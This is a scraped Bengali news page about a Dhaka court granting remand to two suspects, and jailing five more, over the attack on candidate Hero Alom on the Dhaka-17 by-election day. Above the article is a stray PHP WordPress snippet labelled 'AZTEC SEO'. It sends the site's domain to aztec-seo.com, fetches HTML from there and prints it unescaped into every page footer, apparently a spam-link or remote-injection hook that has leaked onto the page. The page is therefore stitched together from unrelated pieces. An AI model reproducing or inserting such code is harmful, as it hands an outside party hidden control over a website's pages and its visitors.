/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); হিরো আলমের ওপর হামলা: দুইজনের ৩ দিনের রিমান্ড | Dhaka Sky News

ডেঙ্গুতে একদিনে রেকর্ড ১৩ মৃত্যু

আগের সংবাদ

প্রধানমন্ত্রীর কাছে জমা হয়েছে সোমবার

পরের সংবাদ

হিরো আলমের ওপর হামলা: দুইজনের ৩ দিনের রিমান্ড

আদালত প্রতিবেদক

প্রকাশিত: July 18, 2023 , 7:37 pm

ঢাকা-১৭ আসনের উপনির্বাচনে ভোটগ্রহণের দিন স্ততন্ত্র প্রার্থী আশরাফুল আলম ওরফে হিরো আলমের ওপর হামলার অভিযোগে গ্রেপ্তার ছানোয়ার কাজী ও বিপ্লব হোসেনকে তিন দিনের রিমান্ডে পাঠিয়েছেন আদালত। এক আবেদনের প্রেক্ষিতে ঢাকা মহানগর হাকিম আরাফাতুল রাকিব মঙ্গলবার এ রিমান্ড মঞ্জুর করেন।

এদিন তাদের আদালতে হাজির করে পুলিশ। এরপর মামলার সুষ্ঠু তদন্তের জন্য সাতদিনের রিমান্ড আবেদন করেন মামলার তদন্তকারী কর্মকর্তা বনানী থানার উপ-পরিদর্শক নুরে উদ্দিন। উভয়পক্ষের শুনানি শেষে এ আদেশ দেন বিচারক।

একই সময় মামলার পাঁচ আসামিকে আদালতে হাজির করে কারাগারে আটক রাখার আবেদন করা হয়। অন্যদিকে তাদের আইনজীবী জামিনের আবেদন করেন। শুনানি শেষে বিচারক আসামিদের জামিন নামঞ্জুর করে কারাগারে পাঠানোর আদেশ দেন। কারাগারে যাওয়া আসামিরা হলেন- মাহমুদুল হাসান, মুজাহিদ খান, আশিক সরকার, হ্নদয় শেখ ও সোহেল মোল্লা।

একই দিন হামলার ঘটনায় রাজধানীর বনানী থানায় এ মামলা করেন হিরো আলমের ব্যক্তিগত সহকারী সুজন রহমান শুভ। মামলায় ১৫ থেকে ২০ জনকে অজ্ঞাত আসামি করা হয়।